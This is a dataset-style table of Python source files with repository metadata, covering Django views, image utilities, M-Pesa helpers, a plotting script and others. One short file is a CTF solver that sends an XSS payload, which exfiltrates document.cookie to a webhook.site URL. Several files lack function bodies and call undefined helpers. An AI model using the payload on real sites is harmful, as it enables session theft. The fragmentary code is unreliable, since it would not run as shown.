hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b0b866e5edd6d67d39733549a96e6a2c9c924cf6 | 1,273 | py | Python | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 7 | 2021-11-19T13:53:56.000Z | 2022-03-28T18:39:04.000Z | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 20 | 2021-09-24T11:39:06.000Z | 2022-03-17T15:50:06.000Z | cblearn/datasets/tests/test_musician_similarity.py | JFHoelscher/cblearn | 18e3ac24f4d4fdb1e649bea201b18abe27862ef7 | [
"MIT"
] | 3 | 2021-11-24T13:23:17.000Z | 2022-03-24T08:57:20.000Z | import numpy as np
import pytest
from cblearn.datasets import fetch_musician_similarity
| 43.896552 | 98 | 0.741555 |
b0b9d81b27101a0308d3e4f404ef228daa426733 | 2,847 | py | Python | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | app/api/views.py | Olexsai2020/todo_app | f93faffefaaa78292930061867d4ecf772fa0add | [
"MIT"
] | null | null | null | from django.utils.decorators import method_decorator
from rest_framework import viewsets, status, generics
from rest_framework.response import Response
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from drf_yasg.utils import swagger_auto_schema
from .models import Todo
from .serializers import UserSignupSerializer, UserLoginSerializer, \
TodoSerializer
| 36.5 | 75 | 0.736916 |
b0ba70e5498a44a15d39de5effec074f2599f013 | 112 | py | Python | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | tests/test_mail_bug.py | FunTimeCoding/mail-bug | 185ed77ce92be44c9b37ebf380a1b80a1385c263 | [
"MIT"
] | null | null | null | from mail_bug.mail_bug import MailBug
| 16 | 37 | 0.669643 |
b0bb6683aa9dcadc69b57d035b577b7055890820 | 8,244 | py | Python | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | django_sqltools/common.py | yang0/django_sqltools | 44e7208337815d2fe8361824d223ba518bf38221 | [
"MIT"
] | null | null | null | # _*_coding:utf-8_*_
from django.conf import settings
import uuid, os, json, logging, time, shutil
from datetime import datetime, date
from PIL import Image, ImageFile
import mimetypes
import re
logger = logging.getLogger(__name__)
def getFileUri(fileInfo):
""" """
if fileInfo is None or fileInfo == "":
return ""
fileList = fileInfo.split(",")
if len(fileList) == 3:
return fileList[0]
else:
return ""
def getFileName(fileInfo):
""" """
return re.findall(r'\w+\.\w+', fileInfo)[0]
def getPath(fileInfo):
""" """
return re.findall(r'[/\w]+[/]', fileInfo)[0]
def moveFile(fileUri, folder):
""" fileInfofolder """
if not os.path.exists(settings.MEDIA_ROOT + fileUri):
return
#
datePath = re.findall(r'[/][/\w]+[/]', fileUri)[0]
path = settings.MEDIA_ROOT + folder + datePath
if not os.path.exists(path):
os.makedirs(path)
#
os.rename(settings.MEDIA_ROOT + fileUri, path + getFileName(fileUri))
return folder + datePath + getFileName(fileUri)
def getUploadImageSize(fileInfo):
""" @return width,height"""
if fileInfo is None or fileInfo == "":
return None, None
fileList = fileInfo.split(",")
if len(fileList) == 3:
sizeList = fileList[1].split("_")
return sizeList[0], sizeList[1]
else:
return None, None
def getFileSize(fileInfo):
""" """
if fileInfo is None or fileInfo == "":
return None
fileList = fileInfo.split(",")
if len(fileList) == 3:
return fileList[2]
else:
return None
def resizeImage(imgPath, thumbPath, width, height, pathRoot=settings.MEDIA_ROOT):
""" @param imgPath () @param thumbPath """
img = pathRoot + imgPath
resizeImg = pathRoot + thumbPath
if os.path.exists(img):
image = Image.open(img)
#
newWidth = 0
newHeight = 0
srcWidth, srcHeight = image.size
if srcWidth <= width and srcHeight <= height:
newWidth = srcWidth
newHeight = srcHeight
else:
ratioH = 1.0 * srcHeight / height
ratioW = 1.0 * srcWidth / width
if ratioH >= ratioW:
newHeight = height
newWidth = int(1.0 * height / srcHeight * srcWidth)
else:
newWidth = width
newHeight = int(1.0 * width / srcWidth * srcHeight)
if image.format == 'GIF':
image = image.convert('RGB')
image.resize((newWidth, newHeight), Image.ANTIALIAS).save(resizeImg, format=image.format, quality=95)
if os.path.exists(resizeImg):
return True
return False
def isImageSize(img, width, height):
""" @param img """
image = Image.open(img)
srcWidth, srcHeight = image.size
if srcWidth == width and srcHeight == height:
return True
return False
def getImageSize(img):
""" @param img """
image = Image.open(img)
srcWidth, srcHeight = image.size
return srcWidth, srcHeight
def cropImageCenter(img, newImg, width, height, pathRoot=settings.MEDIA_ROOT):
""""""
img = pathRoot + img
newImg = pathRoot + newImg
image = Image.open(img)
srcWidth, srcHeight = image.size
ratioH = 1.0 * srcHeight / height
ratioW = 1.0 * srcWidth / width
x1 = 0
y1 = 0
x2 = 0
y2 = 0
if ratioW <= 1 or ratioH <= 1:
# if ratioW<=1:
# x1=0
# else:
# x1=int(1.0*(srcWidth-width)/2)
# if ratioH<=1:
# y1=0
# else:
# y1=int(1.0*(srcHeight-height)/2)
x = int(1.0 * (srcWidth - width) / 2)
x1 = x if x > 0 else 0
y = int(1.0 * (srcHeight - height) / 2)
y1 = y if y > 0 else 0
x2 = x1 + width
y2 = y1 + height
x2 = x2 if x2 <= srcWidth else srcWidth
y2 = y2 if y2 <= srcHeight else srcHeight
box = (x1, y1, x2, y2)
image.crop(box).save(newImg)
else:
#
newWidth = 0
newHeight = 0
if ratioW <= ratioH:
newWidth = width
newHeight = int(srcHeight / ratioW)
else:
newHeight = height
newWidth = int(srcWidth / ratioH)
if image.format == 'GIF':
image = image.convert('RGB')
image.resize((newWidth, newHeight), Image.ANTIALIAS).save(newImg, format=image.format, quality=95)
x = int(1.0 * (newWidth - width) / 2)
y = int(1.0 * (newHeight - height) / 2)
x1 = x if x > 0 else 0
y1 = y if y > 0 else 0
x2 = x1 + width
y2 = y1 + height
x2 = x2 if x2 <= newWidth else newWidth
y2 = y2 if y2 <= newHeight else newHeight
box = (x1, y1, x2, y2)
image = Image.open(newImg)
image.crop(box).save(newImg)
if os.path.exists(newImg):
return True
return False
| 31.346008 | 149 | 0.548156 |
b0bbdeb9ad8ad6836124106f4fb1414f2a3afe49 | 1,853 | py | Python | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 2 | 2020-05-07T00:46:36.000Z | 2020-05-26T10:17:36.000Z | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 2 | 2022-02-27T20:43:49.000Z | 2022-03-02T12:28:26.000Z | csn_searcher/loader.py | box-key/shanet | 6a2679a2dcb98dc4447af8eb453e297cd7585c79 | [
"Apache-2.0"
] | 1 | 2020-05-08T23:32:03.000Z | 2020-05-08T23:32:03.000Z | import requests
from tqdm import tqdm
from time import sleep
import os
| 38.604167 | 90 | 0.563411 |
b0bf332f22eca1ba57686a0f75bc10bbc8f9a9d8 | 75 | py | Python | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 33 | 2016-01-20T07:35:48.000Z | 2022-03-14T09:20:51.000Z | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 2,410 | 2016-01-22T18:13:01.000Z | 2022-03-31T16:57:34.000Z | components/server/src/shared/routes/plugins/__init__.py | ICTU/quality-time | 88d80ea30e35bd5f0bf5cce7cb43dc9f439e91f5 | [
"Apache-2.0"
] | 21 | 2016-01-16T11:49:23.000Z | 2022-01-14T21:53:22.000Z | """Bottle route plugins."""
from .injection_plugin import InjectionPlugin
| 18.75 | 45 | 0.786667 |
b0c2140b35a3bb72f96b2eb82a9fe58420a9a0cf | 4,419 | py | Python | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | airflow/providers/tesouro_gerencial/hooks/tesouro_gerencial.py | CarlosAdp/airflow-providers-tesouro-gerencial | f48ba321a5152dfd9b72107f640c66b217d59b9d | [
"MIT"
] | null | null | null | from enum import Enum
from typing import List, Union
from urllib.parse import urljoin
import warnings
from airflow.exceptions import AirflowException
from airflow.providers.siafi.hooks.siafi import SIAFIHook
import requests
warnings.filterwarnings('ignore', message='Unverified HTTPS request')
| 32.977612 | 76 | 0.605114 |
b0c27fbbd572c04635510356965faf39003f2e6a | 843 | py | Python | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | offensive_nn/models/offensive_lstm_model.py | TharinduDR/OffensiveNN | 336b377c44a7067d2e23ca4a8d331ce7f99157cc | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
| 42.15 | 93 | 0.664294 |
b0c2a699dca314b9665d88e6e73956104ae6f215 | 2,852 | py | Python | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | null | null | null | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | 2 | 2018-03-27T11:06:46.000Z | 2020-10-27T20:48:51.000Z | st_library/utils/databases/postgres.py | shortesttrack/dataprovider-py | 3ecbcb5e09da09614a708e4ef990acdd3443c6ed | [
"Apache-2.0"
] | 4 | 2018-02-26T08:12:39.000Z | 2018-05-18T06:01:01.000Z | import backoff
import psycopg2
from psycopg2.extras import DictCursor, NamedTupleCursor
from st_library.utils.generics.connectors import ConnectorContainer
_disconnect_errors = (psycopg2.InterfaceError, psycopg2.OperationalError,)
_backoff = backoff.on_exception(backoff.expo, _disconnect_errors, max_time=30, max_tries=30)
def fetchall(self):
return self._cursor.fetchall()
def fetchmany(self, *args, **kwargs):
return self._cursor.fetchmany(*args, **kwargs)
def fetchone(self):
return self._cursor.fetchone()
| 29.102041 | 92 | 0.630435 |
b0c2f5602738aeed19e70471739de83515468bde | 566 | py | Python | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | 1 | 2021-11-20T16:28:47.000Z | 2021-11-20T16:28:47.000Z | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | null | null | null | examples/date-format.py | adamantonio/gooeypie | a60416a6a317f83e89541d6fdcac3559ace87cac | [
"MIT"
] | null | null | null | import gooeypie as gp
date_formats = ['28/8/20', '8/28/20', '28/08/2020', '08/28/2020', '2020-08-28',
'28-Aug-2020', 'Friday, August 28, 2020', 'Friday, 28 August, 2020',
'August 28, 2020', '28 August, 2020']
app = gp.GooeyPieApp('Time and date')
app.width = 250
label = gp.Label(app, 'Available formats:')
date_options = gp.Listbox(app, date_formats)
date_options.height = 8
ok = gp.Button(app, 'OK', None)
ok.width = 10
app.set_grid(3, 1)
app.add(label, 1, 1)
app.add(date_options, 2, 1, fill=True)
app.add(ok, 3, 1)
app.run()
| 25.727273 | 84 | 0.627208 |
b0c3406b4cbc0b4a885af800bf5115dce13d7dd2 | 1,131 | py | Python | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | 2 | 2020-10-01T11:50:30.000Z | 2020-10-11T20:59:06.000Z | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | null | null | null | color_contrast_calc/converters/grayscale.py | nico-hn/color_contrast_calc_py | 92cf9eecbd8e5d000f284ec786103cb719df6026 | [
"MIT"
] | 1 | 2019-06-18T02:08:06.000Z | 2019-06-18T02:08:06.000Z | # https://www.w3.org/TR/filter-effects/#funcdef-grayscale
# https://www.w3.org/TR/filter-effects/#grayscaleEquivalent
# https://www.w3.org/TR/SVG/filters.html#feColorMatrixElement
import numpy as np
from . import rgb_clamp
_CONST_PART = np.array([[0.2126, 0.7152, 0.0722],
[0.2126, 0.7152, 0.0722],
[0.2126, 0.7152, 0.0722]])
_RATIO_PART = np.array([[0.7874, -0.7152, -0.0722],
[-0.2126, 0.2848, -0.0722],
[-0.2126, -0.7152, 0.9278]])
def calc_rgb(rgb, s):
"""Convert passed a passed color to grayscale.
The calculation is based on the definition found at
https://www.w3.org/TR/filter-effects/#funcdef-grayscale
:param rgb: The Original RGB value before the conversion.
:type rgb: (int, int, int)
:param s: Conversion ratio in percentage
:type s: float
:return: RGB value of grayscale color
:rtype: (int, int, int)
"""
return rgb_clamp((_calc_grayscale(s) * np.array(rgb)).sum(1))
| 29.763158 | 65 | 0.612732 |
b0c414717803420c137b57f5097d0149ee8b7ac9 | 2,285 | py | Python | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | Coursera/Google_IT_Automation_with_Python/01_Crash_Course_on_Python/Week_5/wk5_mod3_ex2.py | ssolomon2020/Self_Study_Python_Training | b253093b185f4a0d98cb8565f5fcf2b0e4a99556 | [
"MIT"
] | null | null | null | # Specialization: Google IT Automation with Python
# Course 01: Crash Course with Python
# Week 5 Module Part 3 Exercise 02
# Student: Shawn Solomon
# Learning Platform: Coursera.org
# Lets expand a bit on our Clothing classes from the previous in-video question. Your mission:
# Finish the "Stock_by_Material" method and iterate over the amount of each item of a given
# material that is in stock. When youre finished, the script should add up to 10 cotton Polo shirts.
# class Clothing:
# stock={ 'name': [],'material' :[], 'amount':[]}
# def __init__(self,name):
# material = ""
# self.name = name
# def add_item(self, name, material, amount):
# Clothing.stock['name'].append(self.name)
# Clothing.stock['material'].append(self.material)
# Clothing.stock['amount'].append(amount)
# def Stock_by_Material(self, material):
# count=0
# n=0
# for item in Clothing.stock['___']:
# if item == material:
# count += Clothing.___['amount'][n]
# n+=1
# return count
#
# class shirt(Clothing):
# material="Cotton"
# class pants(Clothing):
# material="Cotton"
#
# polo = shirt("Polo")
# sweatpants = pants("Sweatpants")
# polo.add_item(polo.name, polo.material, 4)
# sweatpants.add_item(sweatpants.name, sweatpants.material, 6)
# current_stock = polo.Stock_by_Material("Cotton")
# print(current_stock)
polo = shirt("Polo")
sweatpants = pants("Sweatpants")
polo.add_item(polo.name, polo.material, 4)
sweatpants.add_item(sweatpants.name, sweatpants.material, 6)
current_stock = polo.Stock_by_Material("Cotton")
print(current_stock) | 33.115942 | 102 | 0.661707 |
b0c4a12b9a13aa11699c0f68047498ec12883a9b | 845 | py | Python | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | 2 | 2021-07-17T20:09:24.000Z | 2021-08-09T13:48:38.000Z | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | null | null | null | dictionary.py | LordGhostX/ECXBotsMastery | 199000f8c24b30734869e8bbdebb5901604cd0fa | [
"MIT"
] | 1 | 2021-07-17T00:12:07.000Z | 2021-07-17T00:12:07.000Z | import requests
from bs4 import BeautifulSoup
if __name__ == "__main__":
print(find_word_meaning("intense"))
| 33.8 | 94 | 0.620118 |
b0c74b2e81942f6fdda3626e4e0173d3f260b19b | 1,328 | py | Python | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | 7 | 2017-04-12T10:58:42.000Z | 2021-10-03T18:07:29.000Z | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | null | null | null | client/query_modules/music_module.py | abhishekg785/hiro | 950224d07797740b8840316bb412c1827eab46f0 | [
"MIT"
] | 5 | 2017-07-06T12:28:10.000Z | 2020-01-07T19:45:25.000Z | # simply handles the reply for hello by the user
import re
import random
import os
import sys
import webbrowser
from random import randint
# getting the watson api functions here
PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir))
sys.path.append(PATH)
MUSIC_PATH = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), os.pardir)) + '/music/'
# print MUSIC_PATH
from watson import WatsonAPI
watson = WatsonAPI()
# take necessary actions
# validate the module for the text from the source ( user, server, bot etc ) | 30.181818 | 110 | 0.709337 |
b0c77869671d10fbedbed340a7a7c9b4e8912459 | 2,993 | py | Python | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | null | null | null | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | 6 | 2019-12-26T16:43:14.000Z | 2022-03-21T22:16:25.000Z | ocdsapi_outlet/utils.py | openprocurement/ocdsapi_outlet | e5aab856fbb833d34c4d56831cad7c09d7719a5e | [
"Apache-2.0"
] | 1 | 2018-07-27T16:19:27.000Z | 2018-07-27T16:19:27.000Z | """ utils.py - helper functions """
import logging
import functools
import operator
from repoze.lru import lru_cache
from gevent import spawn
from gevent.subprocess import Popen, PIPE
try:
import boto3
except ImportError:
boto3 = None
def dump(app, logger):
"""
Run dump script as separate process
"""
args = prepare_pack_command(app.config)
logger.warn("Going to start dump with args {}".format(args))
popen = Popen(args, stdout=PIPE, stderr=PIPE)
spawn(read_stream, popen.stdout)
spawn(read_stream, popen.stderr)
popen.wait()
return_code = popen.returncode
logger.info("Dumper ended work with code {}".format(return_code))
def find_package_date(releases):
""" Find max date inside package """
return max(
releases,
key=operator.itemgetter('date')
).get('date')
def prepare_package(date, metainfo=None):
""" Prepare metainfo for package """
base = {
'publishedDate': date,
'releases': [],
'publisher': {
'name': '',
'scheme': '',
'uri': ''
},
}
if metainfo:
base.update(metainfo)
return base
| 25.364407 | 74 | 0.559973 |
b0c81b1e5cf0bc462adf9bdbb74fbefc166b797e | 264 | py | Python | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | apps/logger.py | dabble-of-devops-bioanalyze/single-cell-cloud-lab | 324bf936297b6a5bd23d4f7e1cf3cbd6b31ba495 | [
"Apache-2.0"
] | null | null | null | import colorlog
handler = colorlog.StreamHandler()
handler.setFormatter(
colorlog.ColoredFormatter(
"%(log_color)s%(levelname)s:%(name)s:%(filename)s:%(funcName)s: %(message)s"
)
)
logger = colorlog.getLogger(__name__)
logger.addHandler(handler)
| 22 | 84 | 0.719697 |
b0c97b770b216db5c6e4a8a50cbc39cc9f11e3a2 | 1,467 | py | Python | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | 7 | 2021-02-08T20:22:15.000Z | 2022-03-11T23:19:41.000Z | venv/lib/python2.7/site-packages/daemon/pidfile.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# daemon/pidfile.py
# Part of python-daemon, an implementation of PEP 3143.
#
# Copyright 20082010 Ben Finney <ben+python@benfinney.id.au>
#
# This is free software: you may copy, modify, and/or distribute this work
# under the terms of the Python Software Foundation License, version 2 or
# later as published by the Python Software Foundation.
# No warranty expressed or implied. See the file LICENSE.PSF-2 for details.
""" Lockfile behaviour implemented via Unix PID files.
"""
from __future__ import absolute_import
from lockfile.pidlockfile import PIDLockFile
| 34.116279 | 75 | 0.691888 |
b0c9cd685e3c553d9d38e5a73ed8bdcbc7f01131 | 11,258 | py | Python | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | 1 | 2021-08-20T06:41:57.000Z | 2021-08-20T06:41:57.000Z | zazi/apps/mpesa/utils/transaction.py | felixcheruiyot/zazi-core-banking | 0a2dac42235adcac3cf8c114961e407f54844223 | [
"Apache-2.0"
] | null | null | null | import logging
from django.db import transaction as db_transaction
from django.conf import settings
from django.utils import timezone
from django.urls import reverse_lazy
from zazi.core.utils import get_absolute_url, get_encrypted_text
from .. import api
from ..models import (
MpesaAccount,
MpesaAccountBalance,
MpesaAccountRegisteredURL,
MpesaAPIAccount,
MpesaTransaction,
generate_id)
from ..enums import IdentifierType, CommandID, ResultCode, MpesaTransactionStatus
logger = logging.getLogger(__name__)
| 38.162712 | 119 | 0.669213 |
b0cb0c2e438281324253c5fc9aef08d9586a6478 | 297 | py | Python | gCTF/gctf20/Pasteurize/asd.py | shagunattri/ctfwriteups | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | 1 | 2020-06-11T18:04:22.000Z | 2020-06-11T18:04:22.000Z | gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | 1 | 2021-03-22T09:51:13.000Z | 2021-03-22T09:51:13.000Z | gCTF/gctf20/Pasteurize/asd.py | shagunattri/MemeBoard | 02654f9feeef43aa28c321a7bd9c13a39be8f137 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#JOHN Hammond method result
import requests
url = "https://pasteurize.web.ctfcompetition.com/"
req = requests.post(url,data = {
"content[]": ";new Image().src='https://webhook.site/8db05257-6ad1-44a9-979a-574c1caca5d6?asdf='+document.cookie//"
})
print(req.text)
| 18.5625 | 119 | 0.703704 |
b0cb84a469618ec441c72fc62b1918615cc6f4ec | 7,437 | py | Python | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
] | 11 | 2017-08-03T15:42:19.000Z | 2021-02-04T12:43:35.000Z | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
] | null | null | null | src/test/py/ltprg/results/plot.py | forkunited/ltprg | 4e40d3571d229023df0f845c68643024e04bc202 | [
"MIT"
] | 1 | 2021-02-04T12:43:37.000Z | 2021-02-04T12:43:37.000Z | #!/usr/bin/python
#
# Usage: plot.py [input_file] [xlabel] [ylabel] [x] [y] [where] [where_values] [groupby]
#
# input_file: Input tsv file where the first row contains column names
# xlabel: Label for plot horizontal axis
# ylabel: Label for plot vertical axis
# x: Name of column to plot on horizontal axis
# y: Name of column to plot on vertical axis
# where: Comma-separated list of columns for which to constrain the values contained in the plot
# where_values: Comma-separated list of values by which to constrain the columns given in [where]
# groupby: Comma-separated list of columns on which to group the data into separate curves
#
# The script will generate a 2-dimensional plot containing a set of curves. Values are averaged
# across rows of data that fit the constraints given in [where] and [where_values]. The averages
# are computed for separate curves determined by the [groupby]
#
import csv
import sys
import numpy as np
from scipy import stats
from random import randint
input_file = sys.argv[1]
xlabel = sys.argv[2]
ylabel = sys.argv[3]
x = sys.argv[4]
y = sys.argv[5]
where = None
where_values = None
if len(sys.argv) > 6 and sys.argv[6] != 'None' and sys.argv[7] != 'None':
where = sys.argv[6].split(",")
where_values = sys.argv[7].split(",")
groupby = None
if len(sys.argv) > 8:
groupby = sys.argv[8].split(",")
make_table = False
if len(sys.argv) > 9:
make_table = (sys.argv[9] == "True")
# Map [groupby],x -> y value list filtered by 'where'
rows = read_tsv_file(input_file)
agg = aggregate(rows, x, y, where, where_values, groupby)
statistics, overall_statistics = compute_statistics(agg, groupby)
if make_table:
print(make_aggregate_table(statistics, overall_statistics, xlabel, ylabel, groupby))
else:
print(make_latex_plot(statistics, overall_statistics, xlabel, ylabel, groupby))
| 33.804545 | 202 | 0.600376 |
b0cb8d6fd396de4dcda21996632c248c8e21dab4 | 320 | py | Python | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 19 | 2021-03-17T02:15:18.000Z | 2021-12-14T04:46:21.000Z | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 4 | 2022-03-08T16:28:18.000Z | 2022-03-28T15:11:11.000Z | version.py | ERICMIAO0817/knlp | 56052e49be87d604839d8f81a7295c73a5ac62cf | [
"MIT"
] | 7 | 2021-03-17T02:15:23.000Z | 2022-03-17T15:41:04.000Z | #!/usr/bin/python
# -*- coding:UTF-8 -*-
# -----------------------------------------------------------------------#
# File Name: version.py
# Author: Junyi Li
# Mail: 4ljy@163.com
# Created Time: 2021-01-27
# Description:
# -----------------------------------------------------------------------#
__version__ = "0.2.2"
| 26.666667 | 74 | 0.34375 |
b0ccf531cfab6c9c4a503a8b46e7c6adcacdc203 | 1,336 | py | Python | tests/base.py | abdghani995/docker-falcon | 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | [
"MIT"
] | 19 | 2019-12-14T20:21:03.000Z | 2021-08-11T07:38:42.000Z | tests/base.py | abdghani995/docker-falcon | 6e552a23c3dcc7210083cbe049a7ffbd13a888b1 | [
"MIT"
] | 2 | 2018-05-14T23:05:11.000Z | 2021-11-21T19:32:08.000Z | tests/base.py | vvitsenets/VICTORIA | 843ad6cc1ecec8b0fb424263de37691454cd2b4e | [
"MIT"
] | 4 | 2019-12-15T05:59:57.000Z | 2022-03-05T08:03:04.000Z | import unittest
import falcon
import falcon.testing
import app.util.json as json
from app import create_app
| 29.688889 | 66 | 0.627246 |
b0cef7efc960a0a20a9e808c895f9ff5b72321b6 | 1,903 | py | Python | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | src/zojax/portlet/browser/portlets.py | Zojax/zojax.portlet | f442ae53c400cd39e0c593138b83eeea0d13787e | [
"ZPL-2.1"
] | null | null | null | ##############################################################################
#
# Copyright (c) 2009 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
